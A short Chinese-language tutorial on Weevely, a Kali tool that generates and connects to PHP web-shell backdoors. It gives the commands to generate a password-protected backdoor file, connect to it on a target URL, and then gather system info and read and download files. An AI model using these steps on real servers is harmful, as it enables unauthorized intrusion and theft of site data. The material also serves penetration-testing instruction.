工具weevely使用

Weevely介绍
Weevely工具Python语言编写，集生成木马与加连接于一身，相当于Linux中的中国菜刀，但只适用于php网站,已经加入Kali豪华大礼包中。在Kali1.0中集成的低版本V1.1更是功能强大，支持图片与.htaccess两种绕过方式。新版本中将这两种功能阉割掉了，但是生成的木马文件仍然进行了加密处理。
环境说明
Kali版本：Kali Linux 2.0
工具版本：Weevely 3.7.0
测试系统：Server2008R2+phpstudy+IIS
生成后门
weevely generate [] filename
▲password为生成后门的密码，path为生成路径，如果未填写为当前目录中，filename在帮助文件中未标注，这个在生成时也是需要写的
weevely generate 123456 data.php

连接后门
weevely http://..//..//..//.data.php 123456

目标地址url 密码

▲在使用中URl部分需要加上http://或https://
建立连接后常用命令
-audit.phpconf【查看php相关信息】

-system_info【查看系统信息】

▲Server系统也可直接使用系统命令systeminfo
-net_ifconfig【获取网卡信息】
--PS：ifconfig主要是针对Linux操作系统，要灵活应用。如果是Win系统可以直接使用ipconfig查看。

-file_ls【列出目录中内容】

-file_read【读取文件信息】

-file_download【下载目标站点文件】